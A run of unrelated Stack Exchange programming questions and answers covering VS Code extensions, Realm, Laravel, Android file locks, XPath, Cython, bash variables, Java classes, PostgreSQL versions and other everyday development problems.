case-insensitive Both should be fixed in VS Code 1.78 Were you able to get these working? I'm working on adding some drag and drop functionality to an extension and it looks like I'm getting a very similar situation to what you described above. The dataTransfer.get('...') returns an ID, but an empty string for value. Did you test in VS Code insiders (1.78)? No, I'm using the release version 1.77 since it was mentioned in the above answer that it should be fixed in 1.77. Is the fix not actually implemented yet in 1.77? That would certainly explain it! The comment was out of date. https://github.com/microsoft/vscode/issues/175589 is in the April 2023 milestone, so 1.78 Awesome, will test with the insider's build later on then. Thanks! Works like a charm in the insider's build. ⭐
common-pile/stackexchange_filtered
How to share Realm Result<T> to other view? How to properly share Realm Result object to other View? final class Transaction: Object, ObjectKeyIdentifiable { @Persisted(primaryKey: true) var _id: ObjectId @Persisted var buyCurrency = "" @Persisted var buyAmount = 0 } struct TransactionView: View { @ObservedResults(Transaction.self) var transactions var body: some View { EditView(transactions: transactions) } } import SwiftUI import RealmSwift struct EditView: View { @ObservedRealmObject var transactions: Results<Transaction> var body: some View { ... } I'm having such compilation error: Generic struct 'ObservedRealmObject' requires that 'Results' conform to 'ObservableObject' You need to use Observed Reslts You are right. I’m dumb :D
common-pile/stackexchange_filtered
Laravel 5.7 - Get all users from current user groups This this the structure that I currently use Model User : class User extends Authenticatable implements MustVerifyEmail public function groups() { return $this->belongsToMany('App\Group') ->withTimestamps(); } Model Group : class Group extends Model public function users() { return $this->belongsToMany('App\User') ->withTimestamps(); } Pivot table : Schema::create('group_user', function (Blueprint $table) { $table->integer('group_id'); $table->integer('user_id'); $table->integer('role_id')->nullable(); $table->timestamps(); }); I would like to get all the users who are in same groups of the current user and don't return duplicate users (a user can be in multiple groups). The ideal functions would be : $user->contacts() // Return an object with (unique) contacts of all current user groups AND $user->groupContacts($group) // Witch is the same as $group->users // Return an object with all the users of the current group There is the not functional function i'm working on (Model User.php) : public function contacts() { $groups = $this->groups; $contacts = new \stdClass(); foreach ($groups as $key => $group) : $contacts->$key = $group->users; endforeach; return $contacts; } I'm really not an expert with table structures so if there is a better way to do this, i'm only at the beginning of this personnal project so nothing is written in stone. Optional stuffs : Exclude current user from the list With roles from pivot table With softdelete You can try something like this on your User model public function contacts() { // Get all groups of current user $groups = $this->groups()->pluck('group_id', 'group_id'); // Get a collection of all users with the same groups return $this->getContactsOfGroups($groups); } public function groupContacts($group) { // Get a collection of the contacts of the same group return $this->getContactsOfGroups($group); } public function getContactsOfGroups($groups) { $groups = is_array($groups) ? $groups : [$groups]; // This will return a Collection Of Users that have $groups return \App\User::whereHas('groups', function($query) use($groups){ $query->whereIn('group_id', $groups); })->get(); }
common-pile/stackexchange_filtered
Lock file for writing in android I am storing some data on a file on SD card and reading the same file from different thread . To avoid race condition of reading and writing I want to lock the file in both the scenario (Reading and writing) I have two options in my mind 1) I can do this using Synchronization 2) I can do this using File Lock Which one should I choose and why ? Which one is more memory efficient? I know Synchronization way but I don't know how to use File Lock so can any one tell me the code for using file lock ? I tried with file lock but it is not working in android , please have a look at the code. Any help is appreciated File syncDatafile = new File(file, "sync.txt"); FileInputStream fileInputStream = new FileInputStream(syncDatafile); java.nio.channels.FileLock lock = fileInputStream.getChannel().lock(); try{ FileWriter writer = new FileWriter(syncDatafile, true); writer.write(data); writer.flush(); writer.close(); }catch(Exception ex){ ex.printStackTrace(); }finally{ lock.release(); fileInputStream.close(); } I am sorry guys it was my mistake I was using FileInputStream which is used for reading a file . I am so sorry, now it's fixed File syncDatafile = new File(file, "sync.txt"); FileOutputStream fileoutputStream = new FileOutputStream (syncDatafile); java.nio.channels.FileLock lock = fileInputStream.getChannel().lock(); try{ FileWriter writer = new FileWriter(syncDatafile, true); writer.write(data); writer.flush(); writer.close(); }catch(Exception ex){ ex.printStackTrace(); }finally{ lock.release(); fileInputStream.close(); } I wonder whether it actually worked? Because the FileLock documentation says: File locks are held on behalf of the entire Java virtual machine. They are not suitable for controlling access to a file by multiple threads within the same virtual machine. which implies that this should not work.
common-pile/stackexchange_filtered
XPath. Getting specific siblings I'm writing a Google app engine project in python. I need to scrap the banks sites, get the exchange rate from them. the example of html: <tr> <td width="2"><img src="./images/zero.gif" width="2" height="2" border="0" /></td> <td width="41" class="curvalsh" align="left" valign="middle"><font color="#DC241F">USD</font></td> <td width="41" class="curvalsh" align="right" valign="middle"><b> 15.20 </b></td> <td width="4" align="left" valign="middle"><img src="./images/zero.gif" width="2" height="20" border="0" hspace="1"></td> <td width="41" class="curvalsh" align="right" valign="middle"><b> 16.00 </b></td> <td width="4" align="left" valign="middle"><img src="./images/zero.gif" width="2" height="20" border="0" hspace="1"></td> <td width="41" class="curvalsh" align="right" valign="middle"> - </td> <td width="2" align="left" valign="middle"><img src="./images/zero.gif" width="2" height="20" border="0" hspace="1"></td> </tr> I need to get the next two tags with text after tag containing "USD" text(tags with 15.20 and 16.00). What i've already done is: xpath = "//tr/td[text()='USD']/following-sibling::td/text()" But this doesn't return anything and this is not exactly what i need, because i have to specify to get 2 tags containing text after tag "USD", because there are also tags which don't contain any text. EDIT: I've also tried like this, still returns nothing xpath = "//tr/td[text()='USD']/following-sibling::td[matches(text(),'(^|\W)[0-9]+.[0-9]+($|\W)','i')]/text()" notice that there is another tag inside td before getting to the searched text, so you can either search directly: //tr/td/font[text()='USD']...... or //tr//font[text()="USD"]...... in any case you will then go one level up using .. much like when browsing the file system. well, and there is another tag hiding there that you can refer directly using b/text() or take all text under next sibling by //text() this is how it might looks: //tr/td/font[text()='USD']/../following-sibling::td/b/text() this works with me, thanks! and is it possible to ignore some inner tags like etc, like to write a kind of universal xpath expression. The problem is that i need to scrap about 30 sites like that so that not to write separate xpath expression to each of them? as said, either / with all tags or // that will skip tags in between, you can also use * for any tag, no other magic...
common-pile/stackexchange_filtered
Per unit calculation I DONT WANT THE SOLUTION The question: The answer: I am only confused why he didn't take the three phase as follow: I believe there is a mistake in the writing from the author. When dealing with balanced 3 phase systems, unless specified otherwise the given voltage and current values are all line values. Therefore, the square root of 3 must be in the denominator.
common-pile/stackexchange_filtered
Cython: efficient custom numpy 1D array for cdef class Say we have a class in cython that wraps (via a pointer) a C++ class with unknown/variable size in memory: //poly.h class Poly{ std::vector[int] v // [...] Methods to initialize/add/multiply/... coefficients [...] e.g., Poly(int len, int val){for (int i=0; i<len; i++){this->v.push_back(val)};}; void add(Poly& p) {for (int i=0; i<this->v.size();i++){this->v[i] += p->v[i];};}; }; We can conveniently expose operations like add in PyPoly using operator overloads (e.g., __add__/__iadd__): cdef extern from "poly.h": cdef cppclass Poly: Poly(int len, int val) void add(Poly& p) #pywrapper.pyx cdef class PyPoly cdef Poly* c_poly cdef __cinit__(self, int l, int val): self.c_poly = new Poly(l, val) cdef __dealloc__(self): del self.c_poly def __add__(self, PyPoly other): new_poly = PyPoly(self.c_poly.size(), 0) new_poly.c_poly.add(self.c_poly) new_poly.c_poly.add(other.c_poly) return new_poly How to create an efficient 1D numpy array with this cdef class? The naive way I'm using so far involves a np.ndarray of type object, which benefits from the existing operator overloads: pypoly_arr = np.array([PyPoly(l=10, val) for val in range(10)]) pypoly_sum = np.sum(pypoly_arr) # Works thanks to implemented PyPoly.__add__ However, the above solution has to go through python code to understand the data type and the proper way to deal with __add__, which becomes quite cumbersome for big array sizes. Inspired by https://stackoverflow.com/a/45150611/9670056, I tried with an array wrapper of my own, but I'm not sure how to create a vector[PyPoly], whether I should do it or instead just hold a vector of borrowed references vector[Poly*], so that the call to np.sum could be treated (and paralellized) at C++ level. Any help/suggestions will be highly appreciated! (specially to rework the question/examples to make it as generic as possible & runnable) This is not possible to do that in Cython. Indeed, Numpy does not support native Cython classes as a data type. The reason is that the Numpy code is written in C and it already compiled when your Cython code is compiled. This means Numpy cannot directly use your native type. It has to do an indirection and this indirection is made possible through the object CPython type which has the downside of being slow (mainly because of the actual indirection but also a bit because of CPython compiler overheads). Cython do not reimplement Numpy primitives as it would be a huge work. Numpy only supports a restricted predefined set of data types. It supports custom user types such types are not as powerful as CPython classes (eg. you cannot reimplement custom operators on items like you did). Just-in-time (JIT) compiler modules like Numba can theoretically supports this because they reimplement Numpy and generate a code at runtime. However, the support of JIT classes in Numba is experimental and AFAIK array of JIT classes are not yet supported. Note that you do not need to build an array in this case. A basic loop is faster and use less memory. Something (untested) like: cdef int val cdef PyPoly pypoly_sum pypoly_sum = PyPoly(l=10, 0) for val in range(1, 10): pypoly_sum += PyPoly(l=10, val)
common-pile/stackexchange_filtered
Classic VM migration to Resource In azure I am looking to migrate my existing Classic Azure VM to Resource VM. Is there any tool available to do that?? Or Help me by providing suitable link to do same. all it takes is 10 seconds of googling. https://docs.microsoft.com/en-us/azure/virtual-machines/windows/migration-classic-resource-manager-overview I already gone through this link but its useless or only theory. However, I am looking for a tool @BrunoFaria Check next steps in that link. All you need is Powershell.
common-pile/stackexchange_filtered
Why is this wordpress page non-responsive? The site I am referring to isn't showing up properly on the mobile side. Here is a look at the fiddle <div id="contactWrapper">. In regards to the actual contact form, the one you will see in JSFiddle will show the short-code. Please refer to the site to see the actual contact form 7 in which I am referring to. The contact page shows excellent on the desktop version, but the mobile side isn't functioning properly in a responsive format. I am seeking some insight to help me solve this problem. If you have a few minutes to take a look at the problem and give your input, that would be appreciative. Tested the website with my good ol' Sony Xperia, looks fine, the contact form is working, what is exactly the problem? @bodi0 - the form needs to move to the left a bit, it's not centered, but only on mobile side your problem #contact2 and #contact1 have pixel size: # contact1 { display: table-cell; width: 380px; float: left; margin-top: 20px; } # contact2 { display: table-cell; width: 670px; float: left; } replace it by: # contact1 { display: table-cell; width: 30%; float: left; margin-top: 20px; } # contact2 { display: table-cell; width: 70%; float: left; } This didn't work. the form is there, it actually needs to move to the left, but on on mobile side.
common-pile/stackexchange_filtered
video.js module Experiencing an error message after install I am using Drupal 8 and attempting to set up the video.js module. The readme file needs work so it's hard to know where I went wrong. Here is what I've done so far: installed the module using composer. went to the video.js GitHub and downloaded the js and placed it in the drupal 8 libraries folder path of libraries/video-js/video.js (not what's listed in the readme file since that said sites/all/libraries, which is a d7 location). added the video.js to my content type field settings. I receive this error message overlay on the video player: No compatible source was found for this video. The video was shot with an iPhone 8 and uploaded using the video module field. What extension is your video file? Dot what? .mov shot on from my iPhone 8 I’m voting to close this question because it's a bug report or support request to a third-party dependency hosted on drupal.org or elsewhere and therefore must be reported there to track issues at a single place, not on Drupal Answers. Try with a .mp4 file and see what happens. To @leymanmx just because I can’t get it working f doesn’t meant it’s a bug........ this is a common error and it’s usually a setup problem that causes it.... not a bug.... and no sssweat, Same issue with .mp4. Im also looking for maximum compatibility. So users can upload most standard format types and be successful. Check if the video file exists somewhere inside the /sites/default/files folder. You could possibly have a permission issue that is not allowing Drupal the write to the /files folder. @nosssweat the files are being Written to that directory and if I select the autoplay option the video plays. But while playing there’s still the error written on top of the video with a big X as well.
common-pile/stackexchange_filtered
Linux Bash Script Variable as command I have to create a script on RHEL and was wondering if I am able to save the output of a command as a variable. For example: 4.2.2 Ensure logging is configured (Not Scored) : = OUTPUT (which comes from the command sudo cat /etc/rsyslog.conf) This is what I have now. echo " ### 4.2.2 Ensure logging is configured (Not Scored) : ### " echo " " echo "Running command: " echo "#sudo cat /etc/rsyslog.conf" echo " " sudo cat /etc/rsyslog.conf Thank you! @user14135159 : Please clarify: Do you mean the standard output of a comand, or stdout+stderr? Here is an example: MESSAGE=$(echo "Hello!") echo $MESSAGE Hello! Or the old standard: MESSAGE=`echo "Hello!"` echo $MESSAGE Hello! In your case: FILE_CONTENT=$(cat /etc/rsyslog.conf) NOTE!!!: It is very important to not use spaces near equal! This form is incorrect: MESSAGE = `echo "Hello!"` MESSAGE: command not found It is good to explain that what you are doing (and what the OP is looking for) is called Command Substitution. Where the output of a command is substituted in place of the command for assignment to a variable. (I know you know but the OP may not -- always helps if they want to search further). Good note that $(...) is preferred over the older \...``. Thank you for the explanation! Really appreciate it :) echo $MESSAGE is buggy. See I just assigned a variable, but echo $variable shows something different! variable=$(command) variable=$(command [option…] argument1 arguments2 …) variable=$(/path/to/command) Taken from https://linuxhint.com/bash_command_output_variable/ command is the name of a specific command built into the shell. It should not be used as a standin for other commands. @CharlesDuffy What does command do? Simple executing? By default, it forces an external command to be used instead of an alias or function for a single execution. Add the -v option and it behaves like a built-in version of which.
common-pile/stackexchange_filtered
Trouble adding object into constructor For a school project we are supposed to create a simple program that takes some input from the user about Dogs (name, breed, age and weight) and puts them into an ArrayList. Everything seems to be working, but to test the program I want to add some dogs in my method setUp() so that you can test the functions without having to add a new dog every time, which is where i'm lost! If I write the constuctor (Dog Dog = new Dog("Alex", "Pug", 10, 10.0) in setUp(), I get the error message: The value of the local variable Dog is not used. I've tried to put the constructor in case "1" as well, then I don't get any errors but the dog is not added to the arraylist, while I can add new dogs inside the program. I'm really clueless what to do next. The dog needs to be added into the Dog-constructor for the assignment (parts of the code is cropped to be relevant, don't worry about imports or main). class DogReg { private ArrayList<Dog> allDogs = new ArrayList<Dog>(); private Scanner keyboard = new Scanner(System.in); private void setUp() { System.out.print("Hi! Welcome to the Dog register! \n" + "Choose an option between 1-5\n"); System.out.println("1. Register your dog"); System.out.println("2. Increase age"); System.out.println("3. List"); System.out.println("4. Delete"); System.out.println("5. Exit"); } private void runCommandLoop() { // Initierar en while-loop som körs under tiden att willRun == true boolean willRun = true; while (willRun == true) { System.out.print("> "); // Skapar en variabel som konverterar input-sträng till lowerCase String command = keyboard.next(); switch (command) { case "1": // Konstruerar en ny hund in i ArrayList Dog Dog = new Dog(); // Sparar all input till ArrayList System.out.print("\nThe name of the dog: "); Dog.setName(keyboard.next()); System.out.print("The breed of the dog: "); Dog.setBreed(keyboard.next()); System.out.print("The age of the dog: "); int age = keyboard.nextInt(); Dog.setAge(age); System.out.print("The weight of the dog: "); double weight = keyboard.nextDouble(); Dog.setWeight(weight); allDogs.add(Dog); break; class Dog { private String name; private String breed; private int age; private double weight; public Dog (String name, String breed, int age, double weight){ this.name = name; this.breed = breed; this.age = age; this.weight = weight; } public String getName() { return name; } public String getBreed() { return breed; } public int getAge() { return age; } public double getWeight() { return weight; } public void setName(String name) { this.name = name; } public void setBreed(String breed) { this.breed = breed; } public void setAge(int age) { this.age = age; } I can add a dog in setUp() if I'm using this code instead, but we're not supposed to use that: Dog Dog = new Dog(); Dog.setName("Bosse"); Dog.setBreed("Mops"); int age = 10; Dog.setAge(age); double weight = 10; Dog.setWeight(weight); allDogs.add(Dog); Hope it's clear enough, I apologize for grammar and/or spelling, English is not my first language. I didn't thoroughly read your code but one thing: Dog Dog = new Dog(); - avoid such naming at all cost, it will eventually confuse you and introduce bugs. Thus try to stick to the Java naming conventions which state that variable names should start with a lower case letter, i.e. Dog dog = new Dog();. - Think about what happens at this line: Dog.setName(keyboard.next()); - what's Dog here? Is it the class or the variable you're referring to? The compiler just can't know and you probably won't either when reading your code again sometime later. You should respect the java naming convention: Dog dog = new Dog(); If you ask about an error cause by some code, post the exact and complete error message, and post the code causing the error. Not some other code. Name your Dog variable something different. You're naming your variable the same thing as the name of the object and it's confusing the compiler. Try this, for example: Dog newDog = new Dog(); newDog.setName("Bosse"); newDog.setBreed("Mops"); int age = 10; newDog.setAge(age); double weight = 10; newDog.setWeight(weight); allDogs.add(newDog); Thanks for your comment, it did help! @zkulltrail make sure you upvote answers you find helpful and if my answer solved your problem, you can click the checkmark to accept it. Welcome to the site! Follow up question. I want an constructor that is empty for my Case "1" (where I add more dogs) but it feels cheap just to leave it completely blank, is there another way to do it? Edit: I'm talking about: public DogArr (){ } There's nothing inherently wrong with using an empty constructor but you could consider gathering all of the data from the user into variables and putting those into your dog constructor.
common-pile/stackexchange_filtered
In python, whats the most efficient way to apply function to a list my actual data is huge and quite heavy. But if I simplify and say if I have a list of numbers x = [1,3,45,45,56,545,67] and I have a function that performs some action on these numbers? def sumnum(x): return(x=np.sqrt(x)+1) whats the best way apply this function to the list? I dont want to apply for loop. Would 'map' be the best option or anything faster/ efficient than that? thanks, Prasad That function isn't valid syntax. How you're applying the function will probably be the smallest part of your problem; it'll most certainly depend on the structure of the data and how you're able to stream it to memory - either by handling each element by itself or by batching it up. You'll simply have to try - there isn't an answer that fits every use case. what's wrong with return np.sqrt(x)+1? map, for loop, list comprehensions, they will be all in the same ballpark of performance. You aren't getting around looping. Why don't you just want to use a loop? I would have thought loops would be more inefficient for heavy data..? In standard Python, the map function is probably the easiest way to apply a function to an array (not sure about efficiency though). However, if your array is huge, as you mentioned, you may want to look into using numpy.vectorize, which is very similar to Python's built-in map function. Edit: A possible code sample: vsumnum = np.vectorize(sumnum) x = vsumnum(x) The first function call returns a function which is vectorized, meaning that numpy has prepared it to be mapped to your array, and the second function call actually applies the function to your array and returns the resulting array. Taken from the docs, this method is provided for convenience, not efficiency and is basically the same as a for loop Edit 2: As @Ch3steR mentioned, numpy also allows for elementwise operations to arrays, so in this case because you are doing simple operations, you can just do np.sqrt(x) + 1, which will add 1 to the square root of each element. Functions like map and numpy.vectorize are better for when you have more complicated operations to apply to an array thanks @awarrier99, I will have a look. Although i increasingly feel maps might be more suitable for my problem but good to know about numpy.vectorize function as well! @PrasKam no problem. I myself only recently discovered numpy.vectorize so I thought it may be good to mention as well from the docs of np.vectorize : The vectorize function is provided primarily for convenience, not for performance. The implementation is essentially a for loop. consider editing the answer to highlight that
common-pile/stackexchange_filtered
How do I change to the new server version? I have versions 13 and 14 of postgres installed on my system. When I start the server using systemctl start postgresql it always starts version 13. The client application shows version 14. # psql -V psql (PostgreSQL) 14.1 (Debian 14.1-1.pgdg100+1) But the database tells me the server running is version 13. # select version (); version ------------------------------------------------------------------------------------------------------------------ PostgreSQL 13.5 (Debian 13.5-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit (1 row) I found the file<EMAIL_ADDRESS>but it refers to the version as the variable %I. There is a comment at the top of the file that says: # variable %i expands to "version-cluster", %I expands to "version/cluster". What sets that version number? How do I get it to start version 14 when I run systemctl start postgresql? Ideally, I would like to know how to switch back and forth between versions. I am running Debian 10.11.
common-pile/stackexchange_filtered